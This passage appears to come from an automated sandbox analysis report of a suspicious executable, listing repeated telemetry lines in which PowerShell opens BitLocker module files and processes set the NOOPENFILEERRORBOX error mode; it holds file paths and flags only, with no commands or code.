                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
